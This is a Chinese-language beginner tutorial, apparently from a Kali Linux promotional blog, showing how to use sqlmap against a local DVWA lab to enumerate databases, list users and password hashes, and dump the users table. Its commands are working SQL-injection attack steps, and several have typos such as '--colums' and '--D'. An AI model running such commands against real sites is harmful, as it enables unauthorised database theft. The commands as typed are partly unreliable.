- 背景介绍
sqlmap 是一个开源渗透测试工具,它可以自动检测和利用 SQL 注入漏洞并接管数据库服务器。它具有强大的检测引擎,同时有众多功能,包括数据库指纹识别、从数据库中获取数据、访问底层文件系统以及在操作系统上带内连接执行命令。 - 准备工作
1.安装好Kali Linux的虚拟机一台;
1.整装待发的小白一个。
3.详细步骤
3.1 在浏览器中输入自己的ip地址打开dvwa的主页面
3.2 选择默认安全等级
3.3 进入sql注入模块
3.4 随便提交一个数据发现网站提交数据的方式是GET,然后复制地址栏上的URL
3.5 按F12打开浏览器的开发人员工具,然后刷新页面找到刚刚那个请求,然后在请求的请求头中找到cookie,复制其中的值到记事本中
3.6 回到kali打开终端输入以下命令
[email protected]:-# sqlmap -u “http://192.168.0.101/dvwa/vulnerabilities/sqli/?id= 1&Submit=Submit#” --cookie ”security=low; PHPSESSID=r9t toc0nte03r3ofacqfu6jev2" --batch --dbs
3.7 回车后可以看见该网页所有的数据库被爆了出来
3.8 查看当前数据库
[email protected]:-# sqlmap -u “http://192.168.0.101/dvwa/vulnerabilities/sqli/?id= 1&Submit=Submit#” --cookie ”security=low; PHPSESSID=r9t toc0nte03r3ofacqfu6jev2" --batch --current-db
3.9 查看数据库中的用户
[email protected]:-# sqlmap -u “http://192.168.0.101/dvwa/vulnerabilities/sqli/?id= 1&Submit=Submit#” --cookie ”security=low; PHPSESSID=r9t toc0nte03r3ofacqfu6jev2" --batch --users
3.10 查看用户名和密码
[email protected]:-# sqlmap -u “http://192.168.0.101/dvwa/vulnerabilities/sqli/?id= 1&Submit=Submit#” --cookie ”security=low; PHPSESSID=r9t toc0nte03r3ofacqfu6jev2" --batch --users --passwords
3.11 查看某数据库中的所有表
[email protected]:-# sqlmap -u “http://192.168.0.101/dvwa/vulnerabilities/sqli/?id= 1&Submit=Submit#” --cookie ”security=low; PHPSESSID=r9t toc0nte03r3ofacqfu6jev2" --batch --D dvwa --tables
3.12 查看某表中的数据
[email protected]:-# sqlmap -u “http://192.168.0.101/dvwa/vulnerabilities/sqli/?id= 1&Submit=Submit#” --cookie ”security=low; PHPSESSID=r9t toc0nte03r3ofacqfu6jev2" --batch --D dvwa -T users --colums
3.13 保存到本地
[email protected]:-# sqlmap -u “http://192.168.0.101/dvwa/vulnerabilities/sqli/?id= 1&Submit=Submit#” --cookie ”security=low; PHPSESSID=r9t toc0nte03r3ofacqfu6jev2" --batch --D dvwa -T users -C “user,password” --dump
3.14 查看刚刚保存的内容
[email protected]:~# cat /root/.sqLmap/output/192.168.0.101/dump/dvwa/users.cvs
Ps:到此学习完毕,谢谢观看,获取更多干货请持续关注本号!
辛苦原创,各位看官记得好评加关注哦!你也可搜索:Kali与编程,学习更多Kali Linux渗透与白帽编程技巧哦!
点我学习更多Kali Linux渗透测试与网络攻防实战技巧!
亲爱的同学,下篇文章预计在明天下午五点发布!敬请期待!